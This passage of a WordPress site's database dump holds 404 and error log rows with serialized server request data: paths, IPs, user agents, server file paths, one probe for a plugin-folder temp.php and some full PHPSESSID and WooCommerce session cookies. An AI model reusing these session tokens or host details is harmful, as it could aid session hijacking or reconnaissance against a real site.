https://bintara.com.my\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_CONTENT_LENGTH\";s:1:\"0\";s:30:\"REDIRECT_REDIRECT_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:39:\"REDIRECT_REDIRECT_CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:32:\"REDIRECT_REDIRECT_CONTEXT_PREFIX\";s:0:\"\";s:31:\"REDIRECT_REDIRECT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:29:\"REDIRECT_REDIRECT_ERROR_NOTES\";s:54:\"Script timed out before returning headers: wp-cron.php\";s:35:\"REDIRECT_REDIRECT_GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:29:\"REDIRECT_REDIRECT_HTTP_ACCEPT\";s:3:\"*/*\";s:38:\"REDIRECT_REDIRECT_HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:33:\"REDIRECT_REDIRECT_HTTP_CONNECTION\";s:5:\"close\";s:27:\"REDIRECT_REDIRECT_HTTP_HOST\";s:14:\"bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1571828615.4755129814147949218750\";s:33:\"REDIRECT_REDIRECT_HTTP_USER_AGENT\";s:39:\"WordPress/5.1.3; https://bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_X_HTTPS\";s:1:\"1\";s:22:\"REDIRECT_REDIRECT_PATH\";s:29:\"/sbin:/usr/sbin:/bin:/usr/bin\";s:30:\"REDIRECT_REDIRECT_QUERY_STRING\";s:47:\"doing_wp_cron=1571828615.4755129814147949218750\";s:29:\"REDIRECT_REDIRECT_REMOTE_ADDR\";s:12:\"103.6.198.69\";s:29:\"REDIRECT_REDIRECT_REMOTE_PORT\";s:5:\"52366\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"POST\";s:32:\"REDIRECT_REDIRECT_REQUEST_SCHEME\";s:5:\"https\";s:29:\"REDIRECT_REDIRECT_REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1571828615.4755129814147949218750\";s:33:\"REDIRECT_REDIRECT_SCRIPT_FILENAME\";s:52:\"/home/norfaiz/public_html/bintara.com.my/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SCRIPT_NAME\";s:12:\"/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SERVER_ADDR\";s:12:\"103.6.198.69\";s:30:\"REDIRECT_REDIRECT_SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:29:\"REDIRECT_REDIRECT_SERVER_NAME\";s:14:\"bintara.com.my\";s:29:\"REDIRECT_REDIRECT_SERVER_PORT\";s:3:\"443\";s:33:\"REDIRECT_REDIRECT_SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:34:\"REDIRECT_REDIRECT_SERVER_SIGNATURE\";s:0:\"\";s:33:\"REDIRECT_REDIRECT_SERVER_SOFTWARE\";s:6:\"Apache\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"500\";s:29:\"REDIRECT_REDIRECT_SUPHP_GROUP\";s:7:\"norfaiz\";s:31:\"REDIRECT_REDIRECT_SUPHP_HANDLER\";s:28:\"application/x-httpd-ea-php56\";s:28:\"REDIRECT_REDIRECT_SUPHP_USER\";s:7:\"norfaiz\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XbAzh5Rr7NRBVHKuKoNT9gAAAI0\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"500\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbAzh5Rr7NRBVHKuKoNT9gAAAI0\";s:12:\"REDIRECT_URL\";s:10:\"/500.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"103.6.198.69\";s:11:\"REMOTE_PORT\";s:5:\"52366\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:10:\"SCRIPT_URL\";s:12:\"/wp-cron.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbAzh5Rr7NRBVHKuKoNT9gAAAI0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571829525.7419\";s:12:\"REQUEST_TIME\";s:10:\"1571829525\";}}','notice','2019-10-23 11:18:55','2019-10-23 11:18:49',35000896,35252608,'https://bintara.com.my/wp-cron.php?doing_wp_cron=1571828615.4755129814147949218750',1,0,'103.6.198.69'),(28870,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:50:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:28:\"/wp-content/plugins/temp.php\";s:14:\"CONTENT_LENGTH\";s:2:\"28\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"POST\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:50:\"https://bintara.com.my/wp-content/plugins/temp.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:28:\"/wp-content/plugins/temp.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XbBzdRMzTXaMpxvfDuZ43AAAAJA\";s:19:\"REDIRECT_SCRIPT_URI\";s:50:\"https://bintara.com.my/wp-content/plugins/temp.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:28:\"/wp-content/plugins/temp.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbBzdRMzTXaMpxvfDuZ43AAAAJA\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"193.106.30.99\";s:11:\"REMOTE_PORT\";s:5:\"43744\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:50:\"https://bintara.com.my/wp-content/plugins/temp.php\";s:10:\"SCRIPT_URL\";s:28:\"/wp-content/plugins/temp.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbBzdRMzTXaMpxvfDuZ43AAAAJA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571844982.0497\";s:12:\"REQUEST_TIME\";s:10:\"1571844982\";}}','notice','2019-10-23 15:36:25','2019-10-23 15:36:22',35566920,37367448,'https://bintara.com.my/wp-content/plugins/temp.php',1,0,'193.106.30.99'),(28871,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:52:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:52:\"/wp-content/plugins/maxbuttons/js/min/front.js?ver=1\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:15:\"gzip,deflate,br\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"en-US\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:352:\"PHPSESSID=1l1cjiqnsg9315tjlu06kk6ru5; wp_woocommerce_session_98154e5ffae2b44b325706407b2cee5a=e62c5f36029ea2506da0471347c72c45%7C%7C1537161422%7C%7C1537157822%7C%7C7f18bdd749e1c3465d661c3a7eb3f3aa; yith_ywraq_session_98154e5ffae2b44b325706407b2cee5a=620b93a214f036c9e693e4798a153a3c%7C%7C1537161422%7C%7C1537157822%7C%7C59fbfb82c1655f8969a016752bc805f1\";s:9:\"HTTP_FROM\";s:26:\"googlebot(at)googlebot.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:32:\"http://bintara.com.my/broadbase/\";s:15:\"HTTP_USER_AGENT\";s:124:\"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:68:\"https://bintara.com.my/wp-content/plugins/maxbuttons/js/min/front.js\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:46:\"/wp-content/plugins/maxbuttons/js/min/front.js\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XbB7BRMzTXaMpxvfDuZ98wAAAIk\";s:19:\"REDIRECT_SCRIPT_URI\";s:68:\"https://bintara.com.my/wp-content/plugins/maxbuttons/js/min/front.js\";s:19:\"REDIRECT_SCRIPT_URL\";s:46:\"/wp-content/plugins/maxbuttons/js/min/front.js\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbB7BRMzTXaMpxvfDuZ98wAAAIk\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"66.249.71.30\";s:11:\"REMOTE_PORT\";s:5:\"51392\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:68:\"https://bintara.com.my/wp-content/plugins/maxbuttons/js/min/front.js\";s:10:\"SCRIPT_URL\";s:46:\"/wp-content/plugins/maxbuttons/js/min/front.js\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbB7BRMzTXaMpxvfDuZ98wAAAIk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571846917.2989\";s:12:\"REQUEST_TIME\";s:10:\"1571846917\";}}','notice','2019-10-23 16:08:39','2019-10-23 16:08:37',34204824,34560680,'https://bintara.com.my/wp-content/plugins/maxbuttons/js/min/front.js?ver=1',1,0,'66.249.71.30'),(28872,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_ORIGIN\";s:22:\"https://bintara.com.my\";s:12:\"HTTP_REFERER\";s:23:\"https://bintara.com.my/\";s:15:\"HTTP_USER_AGENT\";s:88:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0,gzip(gfe)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"192.169.197.122\";s:11:\"REMOTE_PORT\";s:5:\"40948\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbCT2pqgWGLDEoi25Pv@rQAAAgo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571853274.9563\";s:12:\"REQUEST_TIME\";s:10:\"1571853274\";}}','notice','2019-10-23 17:54:37','2019-10-23 17:54:35',35318840,37120560,'https://bintara.com.my/?page_id=18',1,0,'192.169.197.122'),(28873,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/toughbook-t1/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/toughbook-t1/\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/toughbook-t1/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbCg@WngQRwkUD6JqiPj9gAAAMw\";s:12:\"REDIRECT_URL\";s:14:\"/toughbook-t1/\";s:11:\"REMOTE_ADDR\";s:12:\"40.77.167.32\";s:11:\"REMOTE_PORT\";s:4:\"7515\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/toughbook-t1/\";s:10:\"SCRIPT_URL\";s:14:\"/toughbook-t1/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbCg@WngQRwkUD6JqiPj9gAAAMw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571856633.3878\";s:12:\"REQUEST_TIME\";s:10:\"1571856633\";}}','notice','2019-10-23 18:50:36','2019-10-23 18:50:33',34283224,36079416,'https://bintara.com.my/toughbook-t1/',1,0,'40.77.167.32'),(28874,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:153:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.4882.400 QQBrowser/9.7.13076.400\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"139.180.211.29\";s:11:\"REMOTE_PORT\";s:5:\"41080\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbCmumngQRwkUD6JqiPm@AAAANA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571858106.658\";s:12:\"REQUEST_TIME\";s:10:\"1571858106\";}}','notice','2019-10-23 19:15:09','2019-10-23 19:15:07',35315176,37122144,'https://bintara.com.my/?page_id=18',1,0,'139.180.211.29'),(28875,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:129:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 UBrowser/6.2.4091.2 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"196.245.255.177\";s:11:\"REMOTE_PORT\";s:5:\"42941\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbC@zl-4xFI9b97jkRjIogAAAZg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571864270.4844\";s:12:\"REQUEST_TIME\";s:10:\"1571864270\";}}','notice','2019-10-23 20:57:54','2019-10-23 20:57:50',35315048,37119752,'https://bintara.com.my/?page_id=18',1,0,'196.245.255.177'),(28876,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:52:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:52:\"/wp-content/plugins/maxbuttons/js/min/front.js?ver=1\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:15:\"gzip,deflate,br\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"en-US\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:352:\"PHPSESSID=qj7g969hu9oh97273dl4tjns35; wp_woocommerce_session_98154e5ffae2b44b325706407b2cee5a=2d73555b2526cbb598933203660a61e0%7C%7C1533508674%7C%7C1533505074%7C%7Cad45b23b725f619ae28ad757dd11d346; yith_ywraq_session_98154e5ffae2b44b325706407b2cee5a=4214a447cbdaabebdb647c8258f2fb7b%7C%7C1533508674%7C%7C1533505074%7C%7C96680f5dadad277c4d9dadc05220b605\";s:9:\"HTTP_FROM\";s:26:\"googlebot(at)googlebot.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:70:\"http://bintara.com.my/?option=com_content&view=article&id=49&Itemid=55\";s:15:\"HTTP_USER_AGENT\";s:124:\"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) 